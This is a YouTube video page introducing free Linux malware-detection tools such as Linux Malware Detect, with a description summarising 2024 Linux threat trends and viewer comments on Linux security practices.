Linux Malware: 5-Minute Fix
Вставка
- Опубліковано 8 жов 2024
- Think you are safe from malware while using Linux? Think again.
Malware for Linux is rising. I have some tools that may help detect and clean it from your system. All Free.
Gihub for LMD: github.com/rfx...
Here are some trends in Linux malware threats in 2024:
Increased attacks
In the first quarter of 2024, there was a nearly 130% increase in attacks on Linux users compared to the same period in 2023.
New ransomware variants
Some new ransomware variants targeting Linux include:
Mallox: Updated in 2024 to target Linux devices using a Python script
TellYouThePass: A new variant of the "TargetCompany" ransomware family that targets VMware ESXi environments
Play: A new Linux variant that targets ESXi environments and uses a double-extortion tactic
Rootkits
A particularly insidious type of malware that can go undetected for long periods
Vulnerabilities
Some common vulnerabilities include backdoor.php.webshell.smmr, backdoor.asp.webshell.gifjmb, backdoor.python.webshell.ac, SQL injection, and command injection
Exploiting Ray
Attackers are exploiting a vulnerability in the open-source framework Ray, which is used for machine learning, scientific computing, and data processing
Want more details? Check these out:
Linux Threats: www.trendmicro...
All CyberSecurity Threats: www.trendmicro...
AI Thumbnail: Clint Pengwood
Support me on Patreon: / djware
Follow me:
Twitter @djware55
Facebook: / don.ware.7758
Gitlab: gitlab.com/djw...
#djware #cybergizmo #malware - Наука та технологія
Github for LMD: github.com/rfxn/linux-malware-detect
To my understanding there are tons of Linux malware, but they target where Linux has the big market share: servers. If desktop Linux become popular enough, it would surprise me a lot if Linux malware for desktop didn't become more common. So I tend to be careful online regardless of the OS I'm on.
While it is true some of the malware attacks apache servers, there is growing class of malware which is coming after the desktop users as well
@@CyberGizmo Yeah, it wasn't meant as a counter to your point, just an addition.
Thumbnail: Clint TuxWood
Thanks for that information, knowledgeable Linux Papa Smurf!
Thanks for the intel.
With Linux growing in popularity, I've decided that the next time I reinstall I should probably invest some time into security.
How do I know that the thing I download from some random git repo doesn't itself contain or download malware ?
Not asking to be a smart a$$.
You might want to check how long the author has been on git hub, what are their ratings, what other projects have they worked on, and if in doubt still ask around on the linux communities.
@@CyberGizmo Thanks. Ken Thompson did a number on me with his paper "Reflections On Trusting Trust". That is my cross to bare.
i wasnt aware ot this ... yet ive been yapping around of a decent malware tool being long overdue on linux. 1q seems its scope is still limited to on file stuff (yes on linux most things are a file...) and what gets flagged because i dread the day i find out some seemingly innoicent (to another piece of software) is laying dorment in the filesystem only to be woken up by some inotify trigger into action curling and assembling some pice malware into a shell
Linux is growing and that attracts the hacking community. The 'tinfoil hat' philosphy that Linux is super-safe is ridiculous!
''Security via obscurity'' was always a dodgy proposition... control the idiot at the keyboard to limit the pain. 🙃
Linux IS super safe compared to proprietary OS alternatives. Critical vulnerabilities are fewer, discussed in the open, and patched faster.
Hackers have always been interested in Linux because the majority of the planet’s business infrastructure runs on it. While linux is only beginning to have strong representation in desktop PCs, the real money to be made hacking is exploiting businesses servers.
Linux is Security is a Little better than windows
@@demos113 There are ways that the term applies. Being a minority OS isn't one of them. I'll give a simple one that might free a cat or two...
When the US fought in WW2 they used Navaho speakers rather than create a code language of their own. It had a known format, but the double obscurity made it a great choice..
1. Being a real language, those trying to decode it would often be led off the path to its deconstruction. (in plain site but obscured)
2. Well, the obscurity of it still remaining, while unknown, "encoded", obscuring it away from initial prying eyes.
Had it not been a real language with an organic history... it would have lacked the "anti-patterns" that hamper a simple reverse engineering of "structurally built" codes.
The fact that I see within this an application of "security through obscurity" is in fact obscured by the application of "disguise", with the obscurity "under the mask" so to say. Your first reaction will be to disagree... until you look a little deeper.
I'm hoping they wont fully turn their gaze on Linux until/unless we get to 10% market share, but that's probably just wishful thinking. They are getting plenty of money from Windows users.
Is Kaspersky a good anti-malware program for Linux as well?
Majority of servers run linux and android uses linux kernel so how did you arrive at 1+ percent for linux when you include servers and phones? Doesn't add up, sir
I'm curious why you picked LMD over ClamAV? Especially since LMD seems to be tailored to servers rather than desktops
Use also Symantec for production server
Thank you for this.
Nice, I will give this a try
You use more instead of less. Can I dare ask why? Just really curious.
You linked to a bunch of articles about malware but not to the github of any of the tools you mentioned. Can you post the github links?
github.com/rfxn/linux-malware-detect, I updated the description and pinned a comment as well, thanks for catching that, I must have over-wrote it while editing the description
Imutable distribution is more resistant to malware?
While Immutability offers some defense against malware, it is not fool proof, I compare it to a submarine,..with. screen door.
I'm extremely new to linux, I dont understand how to download this or make it clean my pc. None of the commands make sense to me, what do i do in order to run this?
@@temple69 I can help. What Linux distro did you install? Linux mint, Ubuntu, Pop os or something else?
@@minion3806 qubes
Debian
What happened to COPS and SATAN?
Ahhh yes Dan Farmers software, I believe SATAN was discontinued in 2006 and COPS you might be able to find still, but its sorta regarded as obsolete today. Good question.
I'm somehow thinking China should be interested in the Linux OS Market, but as far as I can search the market ist at almost 0%.
@@Strammeiche Very little people in China can read Linux documentation on English. But all the Microsoft documentation is translated to Chinese.
This is a security boon for Linux.
👍DJ!
What is this "Linus" hardening software he talked about?
Lynis is how it's spelled.
@@JohnPitney Thanks for the help.
Thanks DJ. Hey man, I thought the words "Linux" and "malware" were mutually exclusive. 😉
We really need AI anti virus software. We're constantly working with open source software. If we had an AI that could analyze the "intent" of the source code that compiles a software, as opposed to essentially just regex'ing the byte code against a database of known malware, we could potentially get rid of this issue all together.
Hueristics already does that... It is about accuracy. Trusted channels are the best way to avoid malware... dont go to dodgy sites, keep a safe perimeter, have battery backups for servers, routers, and other essential hardware to reduce attacks. Obscurity is always useful... Noteriety only when prepared to return to Obscurity.
@@roguegryphonica3147 As a dev I work a lot with code packages which are distributed and updated through stores which ,unlike major linux repos, do not have the capabilities to check them individually (npm, pip, etc). A single app can easily have a thousand such dependencies, and while I do look at the source code of modules I install for the first time, I do not always look at the entire dependency chain. And even when I do, then the author of the module could push a "security patch" somewhere down the line and I would just pull those changes right into my own software, because I lack the resources to check a hundred git commits every single day.
This worries me a great deal. Heuristics can't help much if a package that's meant to download a patch from my own server suddenly downloads malware from a different one for example. Or if a module that's meant to encrypt my data using my key suddenly uses a different key and it then holds my data for ransom. I feel like AI could look at these commits and say "Hmmm, something isn't adding up here, this piece of code does not improve the core functionality that's claimed in the package description, let's ping it for human review."
Great video, like all yours!
Thank You @crosbowbeat!